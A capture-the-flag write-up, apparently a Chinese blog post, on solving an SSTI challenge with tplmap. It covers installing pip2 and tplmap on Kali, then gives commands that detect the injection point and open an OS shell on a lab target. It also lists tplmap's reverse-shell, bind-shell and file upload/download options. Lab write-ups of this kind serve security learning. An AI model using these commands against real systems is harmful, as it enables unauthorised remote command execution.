1.题目
SSTI -Simple2提示了SSTI,提示了参数flag。显示这是一道以flag为参数的SSTI模板注入题目
因此,使用模板注入工具tplmap来解题。
2.知识点
kali 下安装tplmap
1.安装kali下的python2的pip工具
kali2020版及以上, 输入python2命令会执行python2, python3也存在。
但pip默认是pip3, 而我们需要的是pip2, 所以我们需要先安装pip2
# 进入/home/kali目录
cd
#下载pip2安装脚本
wget https://bootstrap.pypa.io/pip/2.6/get-pip.py
#python2执行 需要sudo权限
sudo python2 get-pip.py
#升级pip2
sudo pip2 install --upgrade pip
#安装pip2扩展工具,不然后面安装还是报错
sudo pip2 install --upgrade setuptools
2.tplmap的安装和使用
tpl是用python2编写的,报错一般是使用了py3
以下操作均在kali 2021的环境下操作
2.1 使用git克隆tplmap
git clone https://github.com/epinna/tplmap
cd tplmap
sudo pip2 install -r requirements.txt`
2.2 操作实例
#探测注入点
python2 tplmap.py -u 'http://xxx.xx.xx.x/?flag'
#获取shell
python2 tplmap.py -u 'http:///xxx.xx.xx.x/?flag' --os-shell
2.3 详细命令
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
3.问题解析
#探测注入点
python2 tplmap.py -u 'http://114.67.175.224:14662/?flag'
#获取shell
python2 tplmap.py -u 'http://114.67.175.224:14662/?flag' --os-shell
#查看目录
ls
#发现flag文件,打开
cat flag
版权声明:本文为zw05011原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。